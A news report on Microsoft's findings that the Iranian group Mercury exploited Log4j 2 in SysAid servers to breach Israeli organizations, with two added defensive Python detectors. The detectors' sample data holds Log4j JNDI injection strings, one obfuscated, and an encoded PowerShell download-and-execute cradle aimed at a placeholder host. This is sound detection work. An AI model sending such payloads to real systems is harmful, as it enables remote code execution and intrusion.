Microsoft observes Iranian-based Mercury hackers exploiting Log4j 2 vulnerabilities across Israeli organizations

Iran-based threat group Mercury has been exploiting Log4j 2 vulnerabilities in SysAid applications across Israeli organizations, the Microsoft Threat Intelligence Center (MSTIC) and Microsoft 365 Defender Research Team said in a recent blog post. MSTIC also assesses with high confidence that Mercury’s observed activity was affiliated with Iran’s Ministry of Intelligence and Security (MOIS).

“According to the US Cyber Command, MuddyWater, a group we track as MERCURY, ‘is a subordinate element within the Iranian Ministry of Intelligence and Security,’” the Microsoft blog post disclosed. Furthermore, the researchers at the software giant assess with moderate confidence that Mercury hackers exploited remote code execution vulnerabilities in Apache Log4j 2 across vulnerable SysAid Server instances the targets were running. The blog post said Mercury has also used Log4j 2 exploits in past campaigns. 

While Mercury has used Log4j 2 exploits in the past, such as on vulnerable VMware apps, Microsoft has not seen the hacker group using SysAid apps as a vector for initial access until now, it adds. “After gaining access, MERCURY establishes persistence, dumps credentials, and moves laterally within the targeted organization using both custom and well-known hacking tools, as well as built-in operating system tools for its hands-on-keyboard attack.”

“On July 23 and 25, 2022, MERCURY was observed using exploits against vulnerable SysAid Server instances as its initial access vector,” the Microsoft researchers disclosed. “Based on observations from past campaigns and vulnerabilities found in target environments, Microsoft assesses that the exploits used were most likely related to Log4j 2. The threat actor leveraged Log4j 2 exploits against VMware applications earlier in 2022 and likely looked for similarly vulnerable internet-facing apps. SysAid, which provides IT management tools, might have presented as an attractive target for its presence in the targeted country.”
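For defenders reviewing an internet-facing SysAid (or any Log4j 2-backed) server after reading the above, the following is an added example, not code from Microsoft's post, of scanning web access logs for the JNDI lookup strings Log4j 2 exploitation relies on. The log lines are constructed samples; the host names, addresses and paths in them are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the page). Two carry a
# Log4j 2 JNDI lookup in the User-Agent or the query string; one is benign.
SAMPLE_LOGS = [
    '10.0.0.5 - - [23/Jul/2022:10:01:02 +0000] "GET /sysaid/login.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Jul/2022:10:01:09 +0000] "GET /sysaid/login.jsp HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.7 - - [23/Jul/2022:10:01:15 +0000] "GET /sysaid/?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.9%2Fb%7D HTTP/1.1" 200 512 "-" "curl/7.8"',
]

# Log4j 2 resolves nested lookups such as ${lower:j} or ${::-j} to a single
# character before evaluating the outer lookup, so a detector has to collapse
# them first or it only ever sees the literal "jndi" form.
NESTED = re.compile(r"\$\{(?:lower|upper):([a-zA-Z])\}|\$\{::-([a-zA-Z])\}", re.IGNORECASE)
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str) -> str:
    """URL-decode until stable, then collapse single-character nested lookups."""
    prev = None
    while prev != text:
        prev, text = text, unquote(text)
    prev = None
    while prev != text:
        prev, text = text, NESTED.sub(lambda m: m.group(1) or m.group(2), text)
    return text


def is_jndi_probe(line: str) -> bool:
    """True when the normalized line contains a ${jndi: lookup."""
    return JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (index, matched_fragment) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            hits.append((i, norm[m.start():m.start() + 40]))
    return hits
```

A hit on a server that was reachable from the internet during the dates in the post is a reason to look for the follow-on web shell and encoded PowerShell activity the post describes, not proof of compromise on its own.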

In February, the U.S. Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Cyber Command Cyber National Mission Force (CNMF), along with the U.K.’s National Cyber Security Centre (NCSC-UK), provided details of malicious cyber operations by Iranian government-sponsored advanced persistent threat (APT) actors known as MuddyWater. 

The joint cybersecurity alert identified at the time that MuddyWater is conducting cyber espionage and other malicious cyber operations as part of Iran’s MOIS, targeting a range of government and private-sector organizations across sectors—including telecommunications, defense, local government, and oil and natural gas—in Asia, Africa, Europe, and North America. 

Microsoft said in its post that exploiting SysAid enables the hacker to drop and leverage web shells to execute several commands. Most commands are related to reconnaissance, with one encoded PowerShell that downloads the actor’s tool for lateral movement and persistence.
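The encoded PowerShell command the post mentions is the kind of artifact that shows up in process-creation telemetry. As an added example that is not from Microsoft's post, this decodes the base64 payload of a PowerShell -EncodedCommand from constructed process events and flags the download-cradle keywords a downloader would use; the command lines and the URL in them are constructed samples, and the helper that builds the encoded sample exists only so the test data is self-contained.

```python
import base64
import re


def encode_ps(script: str) -> str:
    """Build the constructed sample only: PowerShell expects UTF-16LE base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation events (not from the page), shaped like what a
# Sysmon EID 1 or Security 4688 collector would record.
SAMPLE_EVENTS = [
    {"image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/t.ps1')")},
    {"image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -Command Get-Date"},
]

# powershell.exe accepts -e, -ec, -enc and -EncodedCommand for the same switch.
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression|\bIEX\b|Net\.WebClient", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the decoded script, or None if no valid encoded command is present."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events):
    """Flag PowerShell launches with an encoded command; note download cradles."""
    findings = []
    for ev in events:
        if "powershell" not in ev["image"].lower():
            continue
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is None:
            continue
        reasons = ["encoded-command"]
        if CRADLE.search(decoded):
            reasons.append("download-cradle")
        findings.append({"cmdline": ev["cmdline"], "decoded": decoded, "reasons": reasons})
    return findings
```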

Once Mercury has obtained access to the target organization, the hacker establishes persistence using several methods. The techniques include dropping a web shell, which provides effective and continued access to the compromised device, and adding a user and elevating their privileges to local administrator. Mercury has also been observed placing its tools in startup folders and ASEP registry keys so that they persist across device reboots, and stealing credentials.

“The actor leverages the new local administrator user to connect through remote desktop protocol (RDP),” Microsoft said. “During this session, the threat actor dumps credentials by leveraging the open-source application Mimikatz. We also observed MERCURY later performing additional credential dumping in SQL servers to steal other high privileged accounts, like service accounts.”

Microsoft also observed Mercury further using its foothold to compromise other devices within the target organizations by leveraging several methods, such as using Windows Management Instrumentation (WMI) to launch commands on devices across the organization, and using remote services with the RemCom tool to run encoded PowerShell commands. However, the post adds that most of the commands launched are meant to install tools on targets or perform reconnaissance to find domain administrator accounts.

Throughout the attack, Microsoft observed that the hackers used different methods to communicate with their command-and-control (C2) server, including built-in operating system tools such as PowerShell, a tunneling tool called vpnui[dot]exe, a version of the open-source tool Ligolo, and remote monitoring and management software called eHorus. “Microsoft will continue to monitor MERCURY activity and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below,” it adds.

Mercury has a long history of spear-phishing targets. Recently, there has been an uptick in these phishing attacks, which are sent from compromised mailboxes and initiate conversations with targets. Additionally, Mercury operators include links to commercial remote access tools, such as ScreenConnect, in these initial phishing emails.

“MERCURY utilizes commercially available file-sharing services as well as self-hosting resources for delivering payloads,” the Microsoft researchers said. “The initial foothold on victims emerges via commercially available remote access applications. This allows MERCURY to gain elevated privileges and be able to transfer files, primarily PowerShell scripts, easily over to the victim’s environment.”

Microsoft also said that Mercury’s tools of choice tend to be the Venom proxy tool, Ligolo reverse tunneling, and home-grown PowerShell programs. “MERCURY targets a variety of Middle Eastern-geolocated organizations. Mailbox victims correlate directly with organizations that do business with the Middle Eastern victims,” it adds.

In March, Cisco Talos researchers observed cyber attackers targeting Turkey and other Asian countries that they believe with high confidence are from groups operating under the MuddyWater umbrella of advanced persistent threat (APT) groups. The MuddyWater hackers are believed to be ‘a conglomerate of multiple teams operating independently rather than a single threat actor group’ and conduct campaigns against various industries, including national and local governments and ministries, universities, and private entities, such as telecommunication providers.
